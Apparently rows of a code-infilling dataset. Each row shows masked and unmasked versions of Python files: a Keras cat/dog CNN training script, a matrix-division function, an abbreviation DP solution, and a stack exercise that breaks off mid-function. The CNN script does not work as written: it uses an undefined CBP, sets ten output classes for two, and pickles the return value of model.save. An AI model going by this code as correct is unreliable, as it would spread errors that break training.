model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
<mask token>
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
<mask token>
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
<mask token>
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| <mask token>
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog']
img_array = []
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray')
plt.show()
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
x = []
y = []
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)
pickle_out = open('x.pickle', 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]
DROPOUT = 0.2
NB_CLASSES = 10
NB_EPOCHS = 10
BATCH_SIZE = 128
VALIDATION_SPLIT = 0.2
OPTIMIZER = Adam()
max, min, accIndex, lossIndex = 70.0, 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0]
layer_sizes = [512, 256, 128, 64]
conv_layers = [3, 2, 1]
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ['Dog', 'Cat']
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
model = tf.keras.models.load_model('64x3-CNN.model')
prediction = model.predict([prepare('dog.jpg')])
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
prediction = model.predict([prepare('cat.jpg')])
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| <mask token>
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
import pickle
import random
import datetime
import time
import tensorflow as tf
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.optimizers import Adam
from tensorflow.python.keras.callbacks import TensorBoard
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog']
img_array = []
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray')
plt.show()
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
x = []
y = []
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)
pickle_out = open('x.pickle', 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]
DROPOUT = 0.2
NB_CLASSES = 10
NB_EPOCHS = 10
BATCH_SIZE = 128
VALIDATION_SPLIT = 0.2
OPTIMIZER = Adam()
max, min, accIndex, lossIndex = 70.0, 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0]
layer_sizes = [512, 256, 128, 64]
conv_layers = [3, 2, 1]
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ['Dog', 'Cat']
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
model = tf.keras.models.load_model('64x3-CNN.model')
prediction = model.predict([prepare('dog.jpg')])
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
prediction = model.predict([prepare('cat.jpg')])
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| '''
!pip install wget
from zipfile import ZipFile
import wget
print('Beginning file download with wget module')
url = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip'
wget.download(url, 'sample_data/')
print('2. Extract all files in ZIP to different directory')
# Create a ZipFile Object and load sample.zip in it
with ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj:
# Extract all the contents of zip file in different directory
zipObj.extractall('content/')
'''
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
import pickle
import random
import datetime
import time
import tensorflow as tf
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.optimizers import Adam
from tensorflow.python.keras.callbacks import TensorBoard
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog'] #'''categories that we have to deal with'''
img_array= []
for category in CATEGORIES:
path = os.path.join(DATADIR, category) # path to cats and dogs dir
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299 #every image of 299x299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray') # cmap = hot, plasma, cool,
plt.show()
training_data = []
def create_training_data(): # creating training datasets
for category in CATEGORIES:
path = os.path.join(DATADIR, category) # path to cats and dogs dir
classIndex = CATEGORIES.index(category) # 0 for dog and 1 for cat
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
'''shuffle training data'''
random.shuffle(training_data)
# for sample in training_data[:10]:
# print(sample[1])
x=[]
y=[]
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3) #we can't pass a list to keras for training
#'''we have to pass here a numpy array '''
# print(x[0].reshape(-1, IMG_SIZE, IMG_SIZE, 1))
pickle_out = open("x.pickle", 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out= open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]#(224, 224, 3)
DROPOUT=0.2
NB_CLASSES=10
NB_EPOCHS=10
BATCH_SIZE=128
VALIDATION_SPLIT=0.2
OPTIMIZER = Adam()
max, min, accIndex , lossIndex=70.0 , 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0] # 0, 1,2
layer_sizes = [512, 256, 128, 64] #32, 64, 128, 256, 512
conv_layers = [3, 2, 1] # 1, 2,3
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer-1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
model.compile(loss='categorical_crossentropy',
optimizer=OPTIMIZER,
metrics=['accuracy'],
)
history = model.fit(x, y,
batch_size=BATCH_SIZE,
epochs=NB_EPOCHS,
validation_split=VALIDATION_SPLIT,
verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex-1, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"), "wb")
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex>=2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex-1, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ["Dog", "Cat"] # will use this to convert prediction num to string value
def prepare(filepath):
IMG_SIZE = 299 # 50 in txt-based
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR) # read in the image, convert to grayscale
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.
model = tf.keras.models.load_model("64x3-CNN.model")
prediction = model.predict([prepare('dog.jpg')]) # REMEMBER YOU'RE PASSING A LIST OF THINGS YOU WISH TO PREDICT
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
#We can also test our cat example:
prediction = model.predict([prepare('cat.jpg')])
print(prediction) # will be a list in a list.
print(CATEGORIES[int(prediction[0][0])])
'''
alpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) results in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training
beta1. The exponential decay rate for the first moment estimates (e.g. 0.9).
beta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems).
epsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8).
We can see that the popular deep learning libraries generally use the default parameters recommended by the paper.
TensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08.
Keras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0.
Blocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1.
Lasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08
Caffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08
MxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8
Torch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8
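A minimal sketch spelling those Keras defaults out explicitly (assumption: a standalone
illustration, not wired into the training run above):
    from tensorflow.python.keras.optimizers import Adam
    optimizer = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)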
''' | [
1,
3,
4,
5,
6
] |
22 | 95c5971a102fb2ed84ab0de0471278d0167d8359 | <mask token>
| <mask token>
def matrix_divided(matrix, div):
"""Divides a Matrix
Args:
matrix: A list of lists of ints or floats
div: a non zero int or float
Exceptions:
TypeError: if the matrix and/or div is not as stated or the matrix elements
are not of the same size
ZeroDivisionError: if div is zero
Returns: a new matrix holding the results
"""
workmat = []
WrongType = False
TooLong = False
i = 0
if isinstance(matrix, list):
if matrix == []:
WrongType = True
for x in range(len(matrix)):
if isinstance(matrix[x], list):
workmat.append([])
for y in range(len(matrix[x])):
if matrix[x] == []:
WrongType = True
if isinstance(matrix[x][y], int) or isinstance(matrix[x
                        ][y], float):
workmat[x].append(matrix[x][y])
else:
WrongType = True
if x == 0 and y == 0:
i = len(matrix[x])
elif not i == len(matrix[x]):
TooLong = True
else:
WrongType = True
else:
WrongType = True
if WrongType:
raise TypeError(
'matrix must be a matrix (list of lists) of integers/floats')
if TooLong:
raise TypeError('Each row of the matrix must have the same size')
if not isinstance(div, float) and not isinstance(div, int):
raise TypeError('div must be a number')
if div == 0:
raise ZeroDivisionError('division by zero')
for x in range(len(workmat)):
for y in range(len(workmat[x])):
workmat[x][y] = round(workmat[x][y] / div, 2)
return workmat
| #!/usr/bin/python3
"""1. Divide a matrix """
def matrix_divided(matrix, div):
"""Divides a Matrix
Args:
matrix: A list of lists of ints or floats
div: a non zero int or float
Exceptions:
TypeError: if the matrix and/or div is not as stated or the matrix elements
are not of the same size
ZeroDivisionError: if div is zero
Returns: a new matrix holding the results
"""
workmat = []
WrongType = False
TooLong = False
i = 0
if isinstance(matrix, list):
if matrix == []:
WrongType = True
for x in range(len(matrix)):
if isinstance(matrix[x], list):
workmat.append([])
for y in range(len(matrix[x])):
if matrix[x] == []:
WrongType = True
if (
isinstance(matrix[x][y], int) or
                        isinstance(matrix[x][y], float)
):
workmat[x].append(matrix[x][y])
else:
WrongType = True
if x == 0 and y == 0:
i = len(matrix[x])
else:
if not i == len(matrix[x]):
TooLong = True
else:
WrongType = True
else:
WrongType = True
if WrongType:
raise TypeError(
"matrix must be a matrix (list of lists) of integers/floats")
if TooLong:
raise TypeError(
"Each row of the matrix must have the same size")
if not isinstance(div, float) and not isinstance(div, int):
raise TypeError(
"div must be a number")
if div == 0:
raise ZeroDivisionError(
"division by zero")
for x in range(len(workmat)):
for y in range(len(workmat[x])):
workmat[x][y] = round((workmat[x][y] / div), 2)
return workmat
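# A hypothetical quick check (doctest-style; not part of the original task file):
# >>> matrix_divided([[1, 2, 3], [4, 5, 6]], 3)
# [[0.33, 0.67, 1.0], [1.33, 1.67, 2.0]]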
| null | null | [
0,
1,
2
] |
23 | 5fb998fa761b989c6dd423634824197bade4f8a5 | <mask token>
| <mask token>
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
<mask token>
| <mask token>
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| <mask token>
import math
import os
import random
import re
import sys
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [([False] * (m + 1)) for _ in range(n + 1)]
dp[0][0] = True
for i in range(n + 1):
for j in range(1, m + 1):
if a[j - 1] == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1]
elif a[j - 1].upper() == b[i - 1]:
dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]
elif a[j - 1].islower():
dp[i][j] = dp[i][j - 1]
return 'YES' if dp[n][m] else 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| """
You can perform the following operations on the string a:
Capitalize zero or more of a's lowercase letters.
Delete all of the remaining lowercase letters in a.
Given two strings, a and b, determine if it's possible to make a equal to b as described. If so, print YES on a new line. Otherwise, print NO.
Matching can fail because letters may only be capitalized or discarded, not changed.
Function Description
Complete the abbreviation function in the editor below. It must return either YES or NO.
abbreviation has the following parameter(s):
a: the string to modify
b: the string to match
Input Format
The first line contains a single integer q, the number of queries.
Each of the next q pairs of lines is as follows:
- The first line of each query contains a single string, a.
- The second line of each query contains a single string, b.
Constraints
String a consists only of uppercase and lowercase English letters, ascii[A-Za-z].
String b consists only of uppercase English letters, ascii[A-Z].
Output Format
For each query, print YES on a new line if it's possible to make string a equal to string b. Otherwise, print NO.
Sample Input
1
daBcd
ABC
Sample Output
YES
Explanation
We have a = daBcd and b = ABC. We perform the following operations:
Capitalize the letters a and c in a so that it becomes dABCd.
Delete all the remaining lowercase letters in a so that it becomes ABC.
Because we were able to successfully convert a to b, we print YES on a new line.
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the abbreviation function below.
def abbreviation(a, b):
m, n = len(a), len(b)
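    # dp[i][j]: True if the first j chars of a can be turned into the first i chars of b.
    # An equal uppercase char consumes one char of each string; a lowercase char whose
    # uppercase form matches may be capitalized (consume both) or deleted (consume a only);
    # any other lowercase char can only be deleted.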
dp = [[False]*(m+1) for _ in range(n+1)]
dp[0][0] = True
for i in range(n+1):
for j in range(1,m+1):
if a[j-1] == b[i-1]:
dp[i][j] = dp[i-1][j-1]
elif a[j-1].upper() == b[i-1]:
dp[i][j] = dp[i-1][j-1] or dp[i][j-1]
elif a[j-1].islower():
dp[i][j] = dp[i][j-1]
return "YES" if dp[n][m] else "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
| [
0,
1,
2,
3,
4
] |
24 | 5ed439a2a7cfb9c941c40ea0c5eba2851a0f2855 | <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
<mask token>
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
<mask token>
<mask token>
| <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
<mask token>
| <mask token>
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
s.inc(int(op[1]), int(op[2]))
print(s.peek())
if __name__ == '__main__':
operations_cnt = 0
operations_cnt = int(input())
operations_i = 0
operations = []
while operations_i < operations_cnt:
try:
operations_item = str(input())
except:
operations_item = None
operations.append(operations_item)
operations_i += 1
res = superStack(operations)
| import sys
class Stack(object):
def __init__(self):
self.arr = []
def push(self, val):
self.arr.append(val)
def pop(self):
if len(self.arr):
return self.arr.pop()
def inc(self, e, k):
count = min(len(self.arr), e)
for i in range(count):
self.arr[i] += k
def peek(self):
if len(self.arr):
return self.arr[-1]
else:
return 'EMPTY'
def superStack(operations):
s = Stack()
for o in operations:
op = o.split(' ')
if op[0] == 'push':
s.push(int(op[1]))
print(s.peek())
elif op[0] == 'pop':
s.pop()
print(s.peek())
elif op[0] == 'inc':
